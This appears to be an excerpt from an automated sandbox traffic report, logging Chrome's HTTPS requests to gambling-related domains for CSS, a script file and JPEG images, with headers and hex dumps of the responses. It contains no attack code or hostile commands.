                                                                                                                                                          2024-06-09 22:40:56 UTC15721INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          154192.168.2.549894183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:55 UTC553OUTGET /ftl/commonPage/js/bootstrap-dialog.min.js HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:56 UTC705INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 5007
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-24-30
                                                                                                                                                          ETag: W/"5d848f4f-4ea4"
                                                                                                                                                          Date: Thu, 06 Jun 2024 12:05:03 GMT
                                                                                                                                                          Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 12:05:03 GMT
                                                                                                                                                          Age: 297352
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-206
                                                                                                                                                          x-link-via: dgct63:443;xymp24:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-XY-MP-24-30
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-26
                                                                                                                                                          X-Cdn-Request-ID: b95953c52a607d2030d90d6e7f311194
                                                                                                                                                          2024-06-09 22:40:56 UTC5007INData Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 3c 0d 73 db 36 b2 7f c5 e1 74 7c e4 85 62 9c a4 f7 31 52 99 8e 63 3b a9 a7 89 9d 67 bb d7 eb 39 9a 0c 25 82 14 6d 8a d4 91 54 12 9f c2 ff fe 76 f1 45 00 04 25 a5 cd 7b 6f 5e a7 e3 48 c0 2e b0 d8 2f ec 2e 00 b9 c9 ba 98 37 59 59 b8 91 3f f3 36 59 e2 36 0f 2b 52 26 07 cb 32 5e e7 e4 51 18 3a eb 22 26 49 56 90 d8 39 3c 64 ad 01 f9 bc 2a ab a6 f6 36 fa f7 70 e6 56 e4 df eb ac 22 ae 73 f7 ef 35 a9 1e 1c cf 8d 3c af 25 79 4d 94 b1 d9 78 21 8c 2d 66 87 a1 59 63 10 2d 63 6f c3 3e bb ce ac 2c 9b ba a9 a2 d5 28 ce a2 bc 4c 1d ff 56 0c 3c f5 25 e5 73 6f 53 91 66 5d 15 07 33 f8 dc f2 e9 a2 e0 a5 c0 3e a5 c8 40 5d 14 dc fd 17 62 7b 6d db ba cd 22 ab bb 41 60 d6 8f 51 75 30 0b e3 20 29 02 58 57 94 07 27 65 01 f8 eb 79 53 56 13 ec 9c 87
                                                                                                                                                          Data Ascii: <s6t|b1Rc;g9%mTvE%{o^H./.7YY?6Y6+R&2^Q:"&IV9<d*6pV"s5<%yMx!-fYc-co>,(LV<%soSf]3>@]b{m"A`Qu0 )XW'eySV


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          155192.168.2.549895183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:55 UTC575OUTGET /ftl/bwin1768/themes/style/bootstrap-dialog.min.css HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:56 UTC665INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 2780
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-HUZ-MP-04-03
                                                                                                                                                          ETag: "658a8258-adc"
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:56 GMT
                                                                                                                                                          Last-Modified: Tue, 26 Dec 2023 07:35:52 GMT
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:56 GMT
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: MISS
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;huzmp04:80;
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-HUZ-MP-04-03
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-14
                                                                                                                                                          X-Cdn-Request-ID: 38877ee54b1c03f627abdd9176ce23f9
                                                                                                                                                          2024-06-09 22:40:56 UTC2780INData Raw: 2e 62 6f 6f 74 73 74 72 61 70 2d 64 69 61 6c 6f 67 20 2e 6d 6f 64 61 6c 2d 68 65 61 64 65 72 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 20 34 70 78 0a 7d 0a 0a 2e 62 6f 6f 74 73 74 72 61 70 2d 64 69 61 6c 6f 67 20 2e 62 6f 6f 74 73 74 72 61 70 2d 64 69 61 6c 6f 67 2d 74 69 74 6c 65 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 0a 7d 0a 0a 2e 62 6f 6f 74 73 74 72 61 70 2d 64 69 61 6c 6f 67 20 2e 62 6f 6f 74 73 74 72 61 70 2d 64 69 61 6c 6f 67 2d 6d 65 73 73 61 67 65 20
                                                                                                                                                          Data Ascii: .bootstrap-dialog .modal-header { border-top-left-radius: 4px; border-top-right-radius: 4px}.bootstrap-dialog .bootstrap-dialog-title { color: #fff; text-align: center; font-size: 18px}.bootstrap-dialog .bootstrap-dialog-message


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          156192.168.2.549898183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:56 UTC560OUTGET /ftl/commonPage/themes/hb/css/pc.css HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:56 UTC681INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 911
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-TAIZ-MP-07-11
                                                                                                                                                          ETag: W/"5d848f4f-b5d"
                                                                                                                                                          Date: Fri, 07 Jun 2024 13:49:50 GMT
                                                                                                                                                          Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                                                                                                                                          Expires: Sun, 07 Jul 2024 13:49:50 GMT
                                                                                                                                                          Age: 204666
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;taizmp07:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-TAIZ-MP-07-11
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-23
                                                                                                                                                          X-Cdn-Request-ID: 42dd40833b1cb261edaafe84854664b2
                                                                                                                                                          2024-06-09 22:40:56 UTC911INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 55 df 8f 9b 38 10 7e e7 af f0 29 ba 36 d9 2b c4 90 40 1a d0 ea 74 8d ba 6a 1f aa 56 ea bd af 0c 38 c4 5a c7 46 e0 6c 92 46 fb bf 77 30 0e 71 36 e4 b6 3f 5e 8f d5 2a 66 98 f9 66 be 99 cf f6 20 93 42 11 26 68 75 d8 b2 5c ad e2 e9 3c 28 77 c9 8a b2 62 a5 e2 08 37 2f a5 ac 99 62 52 c4 88 a4 b5 e4 1b 45 13 25 cb 18 85 f8 cf 84 d3 a5 6a 57 48 3e d2 6a c9 e5 36 46 2b 96 e7 54 24 6b 52 15 4c b8 ad 8b 1b 4c 23 c0 32 36 1d ef 4e b0 0f a6 9c d5 25 27 fb 18 a5 5c 66 0f c9 93 e3 31 51 6e d4 82 93 ba 3e 2c a1 3c b7 66 df 68 8c fc a8 bf 16 b9 51 1c 08 c4 48 48 41 93 94 64 0f 45 25 37 22 8f 51 55 a4 64 88 df e8 bf 51 92 ca 2a a7 95 71 53 74 a7 5c c2 59 01 48 4d 81 90 76 7c e3 e5 ec b1 4d db f6 02 f9 18 88 99 5e b4 2f d7 7a 81 4d 27 f0 89
                                                                                                                                                          Data Ascii: U8~)6+@tjV8ZFlFw0q6?^*ff B&hu\<(wb7/bRE%jWH>j6F+T$kRLL#26N%'\f1Qn>,<fhQHHAdE%7"QUdQ*qSt\YHMv|M^/zM'


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          157192.168.2.549899183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:56 UTC579OUTGET /061410/rcenter/common/static/css/gb.validation.min.css HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:56 UTC680INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 3788
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-212-14
                                                                                                                                                          ETag: W/"633d510e-2d52"
                                                                                                                                                          Date: Fri, 07 Jun 2024 13:49:50 GMT
                                                                                                                                                          Last-Modified: Wed, 05 Oct 2022 09:40:30 GMT
                                                                                                                                                          Expires: Sun, 07 Jul 2024 13:49:50 GMT
                                                                                                                                                          Age: 204666
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;xymp212:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-XY-MP-212-14
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-29
                                                                                                                                                          X-Cdn-Request-ID: 27f22ddab5a75ff72fc24537ed2e5bd4
                                                                                                                                                          2024-06-09 22:40:56 UTC3788INData Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 5a 5b af e2 58 76 7e ae fa 15 4c 97 a2 ea 2e 0e e5 bb b1 4f a9 95 31 60 c0 5c cd 1d a3 48 23 df 6d b0 bd c1 36 18 18 cd c3 48 23 45 8a f2 12 e5 21 52 f2 32 6f 89 22 45 79 1d 29 4a 7e 4d 7a 66 f2 2f b2 6d cc c1 dc ce a5 d3 a9 64 38 85 8f bd bc f7 da eb b6 d7 fa d6 ae 83 7c fa e1 77 bf fb e3 3f fe e6 bf fe f9 af ff f8 af bf fe c3 6f 7f fd 09 79 ff 79 a3 fb b6 b1 2b a8 40 d3 73 bf 7c ff ce 00 5e 58 08 ec bd fe 98 c3 d1 e5 f6 cb fb 77 a1 be 0d 0b b2 63 9b de 63 4e d5 bd 50 f7 21 51 5d fb 01 f0 1f 73 4b 60 a7 14 57 f6 4d db 2b 28 20 0c 81 fb 98 a3 92 b9 0a f0 35 1d 0e c3 96 db 5c 00 1c 5b cb 7d d0 34 ed cb fb 5f bd 7f ff 59 3d 2d 5c 58 ca 9e ee c4 cb 5b ba 6d 5a e1 23 86 a2 7f 06 a7 03 28 9c e1 80 e8 d1 b2 35 4d f7 0e f3 32 02
                                                                                                                                                          Data Ascii: Z[Xv~L.O1`\H#m6H#E!R2o"Ey)J~Mzf/md8|w?oyy+@s|^XwccNP!Q]sK`WM+( 5\[}4_Y=-\X[mZ#(5M2


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          158192.168.2.54990390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:56 UTC639OUTGET /pc/image-pc/video/sunbet_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:56 UTC633INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:56 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 20027
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-4e3b"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[5],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,3],EU-GER-frankfurt-GLOBAL1-CACHE14[335],EU-GER-frankfurt-GLOBAL1-CACHE8[330,TCP_MISS,333],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: aab7941cd3845030a1feff5855b62aa9
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814485
                                                                                                                                                          X-CCDN-Expires: 2464135
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:56 UTC15751INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:40:56 UTC4276INData Raw: 9a d3 06 04 90 0e 23 3a a7 2a 40 9e 74 40 e0 bc 12 6c ec 17 7c 8f 27 6f 22 f1 ac 4c 89 1c d3 ed 3e 39 67 7d c5 23 67 e8 02 fd 06 bd 7a d0 81 eb 40 b9 74 2e 13 89 a8 d7 4b 44 28 9e 74 7d c4 4b 07 28 c3 7d 95 f6 36 ea ca 38 d8 2d 9e 46 38 5d 2d f7 06 96 38 a4 b4 b9 0b e3 ae e8 24 0a 01 ee 8c b4 fa 4e 9b 4b b6 df a0 c1 3f cb df c4 7d 35 1e ee de ed af bc 83 1c eb 2c 1d e7 26 b5 cf d8 70 dc e6 2e ef 2d 3e 65 1f fe 1d c8 5a da 49 23 5e 47 18 7d e4 c6 8a 77 00 11 b7 32 fd 20 ab 03 4d a7 42 b7 56 c8 62 cd d2 a7 1c 7e 1c bf 6f 1c 6b 9a c7 9d 1e 5a 9d 47 87 3f 67 d0 6a 0f 92 fb 73 ca 78 56 54 db c7 c4 72 36 d6 bc a7 f4 70 b7 f7 56 d3 23 5a ba d1 4c 31 23 20 dd e3 0d 58 c0 20 28 24 93 50 34 1e 6d a6 3a ad 3a b1 f0 22 17 9b 1f 6f 33 4e 0b 77 00 8b ca 40 f1 04 6a e4
                                                                                                                                                          Data Ascii: #:*@t@l|'o"L>9g}#gz@t.KD(t}K(}68-F8]-8$NK?}5,&p.->eZI#^G}w2 MBVb~okZG?gjsxVTr6pV#ZL1# X ($P4m::"o3Nw@j


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          159192.168.2.54990090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:56 UTC635OUTGET /pc/image-pc/video/gc_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:56 UTC633INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:56 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 25956
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-6564"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[5],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE2[343],EU-GER-frankfurt-GLOBAL1-CACHE14[328,TCP_MISS,342],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 80a05689f427762ba7623d3f843cfbd2
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814485
                                                                                                                                                          X-CCDN-Expires: 2464135
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:56 UTC15751INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*Duckydhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:40:56 UTC10205INData Raw: 20 6a 58 b1 d4 de 84 3f a4 2d 4e 32 c2 23 45 67 e5 69 55 90 39 81 eb 5f 43 4d 5d 3c f6 17 24 fc d5 59 d8 b6 b2 81 b6 ab 86 e3 d8 18 b6 dd 96 fd ad ae d3 6d 93 dc 52 00 14 a5 0d 78 70 e7 a3 b1 26 df 1d 9c d4 76 6c 3b 3e 78 c5 ad 4c f6 bc f6 f7 6e 60 30 cb 9c 93 40 b2 a2 28 3e cf 5d 2a 4c 58 9d ae 68 35 ce 96 35 b6 94 a5 59 a6 4f 73 2b 66 3a d4 a7 5d 49 0b 29 2a 21 20 f0 24 0f 43 af 79 11 28 1b b4 14 a4 cc c9 98 ed 4e b4 dd 1b 07 c8 2e af a5 6e a1 c4 97 d4 54 b7 14 0a 97 c4 fe 2a 9a 73 d3 de 7c 48 a6 c4 69 4f 26 24 8c 6e e7 53 e3 5b 26 e0 37 4b 74 e8 b6 e5 05 39 f3 b2 18 88 1d 0d d3 b6 a9 4e a1 a4 a8 fa 10 3a f4 85 c9 57 53 27 b0 53 73 62 48 b3 28 1a a9 61 f4 6b 4e 10 e4 39 16 43 12 5a 34 71 85 a5 d4 1f f3 24 83 c6 be 87 43 b8 04 10 7a 1a a2 c7 2b 43 2a ca
                                                                                                                                                          Data Ascii: jX?-N2#EgiU9_CM]<$YmRxp&vl;>xLn`0@(>]*LXh55YOs+f:]I)*! $Cy(N.nT*s|HiO&$nS[&7Kt9N:WS'SsbH(akN9CZ4q$Cz+C*


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          160192.168.2.54990190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:56 UTC370OUTGET /pc/image-pc/video/allbet_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
